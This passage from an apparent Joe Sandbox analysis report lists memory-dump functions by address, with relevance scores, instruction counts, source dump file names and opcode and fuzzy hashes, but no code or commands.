                    • Instruction Fuzzy Hash: E1E01A35D1492E8EE784FF5CD8555FCB361FB94650F000536C80DA32A2CB206815C784
                    Function 00007FF848F41831 Relevance: .2, Instructions: 246COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 265ef88ee251bd65d71440e4ed286fd0d4d8654d73053a2041caf45dc2608439
                    • Instruction ID: 0070c11eb6b6e7028c70a7e37b1bbe164e8505455c260d2775538006290d8c52
                    • Opcode Fuzzy Hash: 265ef88ee251bd65d71440e4ed286fd0d4d8654d73053a2041caf45dc2608439
                    • Instruction Fuzzy Hash: DC910A71D19A5A9FEB98EB68C8657A8B7F1FF64740F1440BAC00DE7292CF385984CB05
                    Function 00007FF848F40DD9 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6806bc7576ad8aece8eeb43baaca7b78d09712b8dc19365276635b495ec7b12c
                    • Instruction ID: be5959acc478191af0d0a9742e15b5f158fd1a5af778c71b1a339221516ae847
                    • Opcode Fuzzy Hash: 6806bc7576ad8aece8eeb43baaca7b78d09712b8dc19365276635b495ec7b12c
                    • Instruction Fuzzy Hash: 8F716C3091994E8FDB84FF58C895AE9B7B1FFA8340F144576D40DE7296CA38A881CB90
                    Function 00007FF848F408B1 Relevance: .2, Instructions: 210COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1b71f01bae85905eae3b7a8abfcd49b59e36e60e76f1bdf5113edb7634057aea
                    • Instruction ID: 2e893dffdb74a3643209878c9811950e0c0622ade6cc8d0691a4c8131d19d758
                    • Opcode Fuzzy Hash: 1b71f01bae85905eae3b7a8abfcd49b59e36e60e76f1bdf5113edb7634057aea
                    • Instruction Fuzzy Hash: 1C619E3191CA4E8FEB94FF68C8586A9B7E1FFA8741F14017AD409E72D2DB74A841CB44
                    Function 00007FF848F44843 Relevance: .2, Instructions: 207COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dd2bf12924d048e2ce74334b67ca0f0b6208ed16414d42af2afc3102008b7d61
                    • Instruction ID: add647b22e6f44a1a4e3b6a12279bc0e75bbf4b8471d67ac6ad6eb5ac5983a64
                    • Opcode Fuzzy Hash: dd2bf12924d048e2ce74334b67ca0f0b6208ed16414d42af2afc3102008b7d61
                    • Instruction Fuzzy Hash: A081C370D1991D8FEB94EFA8C899BADB7B1FF58340F1041AAD00DE3296DF3469818B44
                    Function 00007FF848F44611 Relevance: .2, Instructions: 172COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ebaa72386f80e3a756c61959241b19b251290acdadd631657aca3dbeac53f92
                    • Instruction ID: 3e45de7e23d059c0f7180507f30f59602e04929cabbf19be7ac62b117b226f9f
                    • Opcode Fuzzy Hash: 7ebaa72386f80e3a756c61959241b19b251290acdadd631657aca3dbeac53f92
                    • Instruction Fuzzy Hash: 7E51D170E19A1D8FDB94EB98C899BADBBB1FF68301F10016AD00DF3291DB346881CB44
                    Function 00007FF848F40AB9 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca08177a2f301cefe72cca1009e2f5098b60d38240e3c3f997367bf368335728
                    • Instruction ID: 7327120e994e6e07756c69d77d084849b5c822ec0a7c6009a123eee9ae590a96
                    • Opcode Fuzzy Hash: ca08177a2f301cefe72cca1009e2f5098b60d38240e3c3f997367bf368335728
                    • Instruction Fuzzy Hash: FA51D870D18A5D8FDF98EF98C8986EDBBB1FFA8741F14012AD409E7296CB349845CB44
                    Function 00007FF848F46129 Relevance: .2, Instructions: 150COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e309db52ceb66dc01bf21225f0148762163aaddc2b170ee7d642f0522ebb7e51
                    • Instruction ID: 942b144b994281c70aa5e2040b45fde4bfa2476d019dfcb000f0cb5d9d277116
                    • Opcode Fuzzy Hash: e309db52ceb66dc01bf21225f0148762163aaddc2b170ee7d642f0522ebb7e51
                    • Instruction Fuzzy Hash: 3A516B70D0CA198FEB95EBA8C4947ACBBB1FFA5741F504576C00AE72D6DB386885CB40
                    Function 00007FF848F438B8 Relevance: .1, Instructions: 138COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c95778de6a1422d05f4659ff5a236f16d8d3fd3b3bd9b7b8e3148e763a6c8906
                    • Instruction ID: 8fbce4d067608ef9b3e7afc9fd73fae609af7e312f4cf9e75dc68b2d90519f5e
                    • Opcode Fuzzy Hash: c95778de6a1422d05f4659ff5a236f16d8d3fd3b3bd9b7b8e3148e763a6c8906
                    • Instruction Fuzzy Hash: CF417C30E1D91D9FEB44EB98D855AEDBBB1FF68740F10017AD00AE3281DB38A8058B55
                    Function 00007FF848F4535F Relevance: .1, Instructions: 136COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c435a495a9efde76dafef3ca80d0044ad6b312ce07ea32a56f53a74485f300fc
                    • Instruction ID: b038cb9d13b255c5531677eb259c0551406b489d4aad65848ed4f3019aee615e
                    • Opcode Fuzzy Hash: c435a495a9efde76dafef3ca80d0044ad6b312ce07ea32a56f53a74485f300fc
                    • Instruction Fuzzy Hash: 64410A70D0895D9FDF94EBA8D895AACBBF1FF68740F50016AD00DE7296DB34A881CB40
                    Function 00007FF848F40C6D Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77c6cc4f262f63bd84aff2e72c842a885a7de7f8500aa8b07a65c41643383c90
                    • Instruction ID: 1d378f65640816320a921186da580f925eeb65c93392746e54b585ae903900f2
                    • Opcode Fuzzy Hash: 77c6cc4f262f63bd84aff2e72c842a885a7de7f8500aa8b07a65c41643383c90
                    • Instruction Fuzzy Hash: F9411471C0961D8FDB85EFA8D4486EEBBB0FF65300F50046AE409F3292DB78A945CB80
                    Function 00007FF848F41521 Relevance: .1, Instructions: 119COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7dfa1aca99563ea31c509e6b81fa5bc772a3f0369659f5f118ecc676848b0f45
                    • Instruction ID: b01b6370ca05d7c2cf8fbc2b741e4e048a93ea1ca1d97130d6988e9b8dbba469
                    • Opcode Fuzzy Hash: 7dfa1aca99563ea31c509e6b81fa5bc772a3f0369659f5f118ecc676848b0f45
                    • Instruction Fuzzy Hash: 3641C934A1891D8FDB99EB58C895BECB7F1FB68705F5440AAD04EE3291DF34A9818B40
                    Function 00007FF848F40AD0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e9ae63eef95bc46e12460c82d40e906a6b237599b0fc8ddf9f375e1ad4b3d3cc
                    • Instruction ID: 3ae7fa1bec9907bc4639006cd3c6abab4871bb04d5c1834b4f64b1031495bef9
                    • Opcode Fuzzy Hash: e9ae63eef95bc46e12460c82d40e906a6b237599b0fc8ddf9f375e1ad4b3d3cc
                    • Instruction Fuzzy Hash: FA31C970D1891D8FDF94EF58D445BEEBBB1FBA8745F10052AD409E3296CB34A845CB84
                    Function 00007FF848F44BE9 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 66e94f46e84e9396dcace745c51a2d2dfe5c4ffe9f6a3ffcedd48483f4e7c543
                    • Instruction ID: 4fb3233352a1b6395bc7d63362fed55c63b8d49afa471c2a1246b7695d8bbba4
                    • Opcode Fuzzy Hash: 66e94f46e84e9396dcace745c51a2d2dfe5c4ffe9f6a3ffcedd48483f4e7c543
                    • Instruction Fuzzy Hash: C6416B70D0A6598FE755EBA4C8586E9BBF1FF69700F5401BAD009E7292CB399982CB40
                    Function 00007FF848F41129 Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f673c88c004b332fcf5339b991b790677bd0eb976779250c32d322d550f292bb
                    • Instruction ID: ea75bd7984d66ebf7e9967d05240a4d9a6f483a0acfcb66c35be9d1574d03982
                    • Opcode Fuzzy Hash: f673c88c004b332fcf5339b991b790677bd0eb976779250c32d322d550f292bb
                    • Instruction Fuzzy Hash: 4D217C3190895D9FDB81EF68D855AEDBBF5FFA8310F00016BE409E3292CA24A881C790
                    Function 00007FF848F44555 Relevance: .1, Instructions: 88COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f3bd0278931a7634a2140fc71ee613ecede324e43bd5fb621e709a808f40f1f1
                    • Instruction ID: 86651e0a606df8cb3d44392ca0d41f84ce192be05fe64b1adee313bfa94080dc
                    • Opcode Fuzzy Hash: f3bd0278931a7634a2140fc71ee613ecede324e43bd5fb621e709a808f40f1f1
                    • Instruction Fuzzy Hash: 7E31D171C1EAC94FEB91EF2898141A97FB0FF65744F4801BBE448932D7DA385944C395
                    Function 00007FF848F43A8D Relevance: .1, Instructions: 86COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0630801ca4fd541a4d1c81c79e76b5dba14c9d009cf3773520f082a28486b4ca
                    • Instruction ID: 90aa74b05226ad253f2e37d422da13af547396b88e1b2a4cbb26eb458ce25050
                    • Opcode Fuzzy Hash: 0630801ca4fd541a4d1c81c79e76b5dba14c9d009cf3773520f082a28486b4ca
                    • Instruction Fuzzy Hash: 4E21D13190DA8A4FE795EB2888657A9BBA0FF62740F0800FAD04CE71D3DF796845C700
                    Function 00007FF848F43F00 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 586ef969dd866db4cc277fa26f7f16f5ec70db48c2a987cbc87b74c2c720e7e5
                    • Instruction ID: da0d6efcbc8107cbcca5052fdb2458c83fb34b242740e43d05002fbf1514f6bb
                    • Opcode Fuzzy Hash: 586ef969dd866db4cc277fa26f7f16f5ec70db48c2a987cbc87b74c2c720e7e5
                    • Instruction Fuzzy Hash: 8A316F30D0961A8FE7A8EB28C8597B9B3B1EF64750F1005BAD41DE32D2CF35A881CB44
                    Function 00007FF848F46895 Relevance: .1, Instructions: 82COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c5b95aa504c1ad13d424c6cf121a04e1bfec1e667ca426004c0a02a5d30fdd6
                    • Instruction ID: 736a3e32cd7ed0230726c6c6593459dd0df84cae61064bb4592a0a3017335dc3
                    • Opcode Fuzzy Hash: 8c5b95aa504c1ad13d424c6cf121a04e1bfec1e667ca426004c0a02a5d30fdd6
                    • Instruction Fuzzy Hash: 9E217572C0921A8FEB58EFA4D4542FEB7F0EF29751F10003AE009B22C1DB785A44CB95
                    Function 00007FF848F43F0B Relevance: .1, Instructions: 77COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c250fddcada2369f80f9ca1dd58002acfbfbbbd4ff1de10e6bb1b11e931a42b8
                    • Instruction ID: 984665a78da7281d44f9e48c1c837dccb330fa5d938ca3798c4658dfb7647c96
                    • Opcode Fuzzy Hash: c250fddcada2369f80f9ca1dd58002acfbfbbbd4ff1de10e6bb1b11e931a42b8
                    • Instruction Fuzzy Hash: AA219031D0E20A9EE768AB68C445AB9B3B1EFA5B54F10047AD41DA32D2CF39A941CB04
                    Function 00007FF848F41048 Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26a4a2e16f824607f7130f37ae3ad4515c9147b38c4956c96cd7fba18964694e
                    • Instruction ID: 15d1fd5fb3367a7fe7533496bfaeeffd2fe0577195128f904ccb5ed16577da25
                    • Opcode Fuzzy Hash: 26a4a2e16f824607f7130f37ae3ad4515c9147b38c4956c96cd7fba18964694e
                    • Instruction Fuzzy Hash: DD219F74A1891D9FDF84EF88D495EEEBBB1FF68301F10416AE50AE3255CB34E8418B94
                    Function 00007FF848F43F43 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0ac73ccec836190ba4a63ff370ba6c191fbd097493adc0971a574291a216463c
                    • Instruction ID: 334dc5353f9235f716646818c69d8bcc6852e0cf391095ccc8c6335a5618e07a
                    • Opcode Fuzzy Hash: 0ac73ccec836190ba4a63ff370ba6c191fbd097493adc0971a574291a216463c
                    • Instruction Fuzzy Hash: 21215830D0E7898EE769AB68C8197B9BBB1EF55750F0405BAD009E72D2CE3898848B55
                    Function 00007FF848F43FC1 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93cfe8d8c9b80e018bc154758802878f69a422c4f88f0c1f3e5a38abcc86a461
                    • Instruction ID: f436af9e2c5748b93d4919576a0df56d06162d23946753bd7ee09eeddf7939bf
                    • Opcode Fuzzy Hash: 93cfe8d8c9b80e018bc154758802878f69a422c4f88f0c1f3e5a38abcc86a461
                    • Instruction Fuzzy Hash: 9011EF3080E78E4FE766AB7888247B97FB1EF96710F0804BAD049E72C3CE289845C751
                    Function 00007FF848F43F62 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77654ba9f32dbd9338a5b297338a7699d5d7daa0f478f737b78d54643c645511
                    • Instruction ID: 98575561842b0e8cb428b1fd90afe081c1685d80c2adf30ea9d3e545e1215fe4
                    • Opcode Fuzzy Hash: 77654ba9f32dbd9338a5b297338a7699d5d7daa0f478f737b78d54643c645511
                    • Instruction Fuzzy Hash: 8711A330C0E60E5FE768AB28C4097BAB7B1EFA5B50F10153AD40DF32C2CF39A8458655
                    Function 00007FF848F43F86 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15d4afaeb4cc3159ccb83201c8b802d6b499203f16c871a153b9da16c4012472
                    • Instruction ID: 113e5cbdc99e790ed42d7aa5a2960a6e851acf2f1e58848a957d8cdac4e5d071
                    • Opcode Fuzzy Hash: 15d4afaeb4cc3159ccb83201c8b802d6b499203f16c871a153b9da16c4012472
                    • Instruction Fuzzy Hash: 37114F70D0E64A8EE7A8BF28C4157B977B1EFA5B94F14143AD41DA32C6CF39A8418708
                    Function 00007FF848F43F74 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c98b6db26aebf82553951e81196500e6f5341559e4e1d6feb21a2e02c392fb31
                    • Instruction ID: 87fd9368c1853189f877a28c3efd655e8310c28ca70bad56ea8c4779c592889d
                    • Opcode Fuzzy Hash: c98b6db26aebf82553951e81196500e6f5341559e4e1d6feb21a2e02c392fb31
                    • Instruction Fuzzy Hash: A9116530D0D64A8FE768AF58C4157B9B7B1EF65B54F14143AD40DF72C6CF39A8418644
                    Function 00007FF848F43EEC Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e8091d599b0597497c12282905d76ceaf8a556b57109db2ef14efd66eba7a41
                    • Instruction ID: b450e5292fcc39133ca599457d0af628a4d68822649d265284aa272b0da5ecba
                    • Opcode Fuzzy Hash: 1e8091d599b0597497c12282905d76ceaf8a556b57109db2ef14efd66eba7a41
                    • Instruction Fuzzy Hash: AB11E030C0E74A8FE368AB28C51A7B9BBB0EF56B50F04107AD419E72D2CF3568408705
                    Function 00007FF848F43F6B Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c1d9435b38313230f813b47d0e639ef5291cf911b5a3b7dcc292e2dcbb023762
                    • Instruction ID: d6964aa4c21e5e0bad0c41e3f6a61e9dffed0b4a75602cc8685ce795caccce5e
                    • Opcode Fuzzy Hash: c1d9435b38313230f813b47d0e639ef5291cf911b5a3b7dcc292e2dcbb023762
                    • Instruction Fuzzy Hash: 75016D70D0E64A8FE764AB28C5193B9BBB1EF95750F04187AD009E72D3CF39A8418715
                    Function 00007FF848F46839 Relevance: .0, Instructions: 38COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 21297d6366e71058722ff503a7d3705eb6283660eb73f4a5919fa2510158ff8e
                    • Instruction ID: cc1f2a3c809efacf83fbf7ce6a5223ac1e5302b24fb542f2d2c113db3cdad4d5
                    • Opcode Fuzzy Hash: 21297d6366e71058722ff503a7d3705eb6283660eb73f4a5919fa2510158ff8e
                    • Instruction Fuzzy Hash: 13F04F71C0D68D8FEB51EB6888582ADBFB0FF26341F1505ABE448E71A2E7389544CB41
                    Function 00007FF848F410EA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dfae3307ab2d3a2e64b548c299260d016636b779ecc6d68aa1e32d5d3e61e2d9
                    • Instruction ID: 2bd5f50156ca0db3c1df0a26d1bfbcc4460bfec47063c74bafe72b148d525466
                    • Opcode Fuzzy Hash: dfae3307ab2d3a2e64b548c299260d016636b779ecc6d68aa1e32d5d3e61e2d9
                    • Instruction Fuzzy Hash: A6E09236D0C99D4FEB90AF68A8066A5BBA4FBDA708F00006AD55CD3192C7259596C385
                    Function 00007FF848F44F5C Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bb9b90e625465f74eea40fbba59832f0d6610ac1cd8abd307e6aa1d85113e2a
                    • Instruction ID: e68c9a14b4356808de04bbfa698edd44bcf204438cbae12d294bf59ebcd9a1c4
                    • Opcode Fuzzy Hash: 5bb9b90e625465f74eea40fbba59832f0d6610ac1cd8abd307e6aa1d85113e2a
                    • Instruction Fuzzy Hash: 63E06F32C4CA0C8FDB80AB68AC0029833A0FBAD308F00066AC40CEB0C2CB644581C306
                    Function 00007FF848F46680 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f78e2b789fefc790731ca81123ce363a83028d74bb60a71150841320b592c5d
                    • Instruction ID: d2eb053ade5a1e2bcf0ab3a7a81ad342195143703e026b4f4399238029593be9
                    • Opcode Fuzzy Hash: 9f78e2b789fefc790731ca81123ce363a83028d74bb60a71150841320b592c5d
                    • Instruction Fuzzy Hash: E1E0DF32D4CA4C8FEB95AB69AC052D876A0FBAE708F00026AD44CD7182E7695996CB05

                    Executed Functions

                    Function 00007FF848F327F6 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: [$]
                    • API String ID: 0-2073744556
                    • Opcode ID: e0f8a2fc0be3161891104f18bd6d57525b34b46bc744c3316e971c51d63c7ced
                    • Instruction ID: f2ca12b2de72c029f0608a164e1852f6746197881347641913b939b8d5fb123c
                    • Opcode Fuzzy Hash: e0f8a2fc0be3161891104f18bd6d57525b34b46bc744c3316e971c51d63c7ced
                    • Instruction Fuzzy Hash: 67810870D19A6D8FDBA9EF18C8856A9B7B1FF58341F1041EAD00DE7291CB356A81CF50
                    Function 00007FF848F31751 Relevance: 1.6, Strings: 1, Instructions: 385COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2373652487.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: @JH
                    • API String ID: 0-3316324915
                    • Opcode ID: cc8db8a12fa197c0e8ad8c1937d7e6e5c05adc3d0582df10f670094e48311f45
                    • Instruction ID: e0750ef981e6eeff0d2682ad236e1505d2b70d5e482981af7937900177e07d1e
                    • Opcode Fuzzy Hash: cc8db8a12fa197c0e8ad8c1937d7e6e5c05adc3d0582df10f670094e48311f45
                    • Instruction Fuzzy Hash: 59D18C71C196999FDB98EB68C8557F8BBB1FF55340F1400BAE009E72D2CB386885CB14
